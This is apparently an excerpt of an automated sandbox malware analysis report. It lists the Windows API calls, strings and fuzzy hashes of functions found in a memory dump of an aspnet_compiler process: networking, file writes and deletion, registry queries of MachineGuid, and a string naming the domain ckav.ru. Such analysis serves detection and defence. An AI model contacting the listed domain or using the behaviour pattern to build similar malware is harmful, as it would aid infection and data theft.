Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B
IDA, xrefs: 00406304

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess_wmemset
String ID: CA
API String ID: 2773065342-1052703068
Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Function 00403C40 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

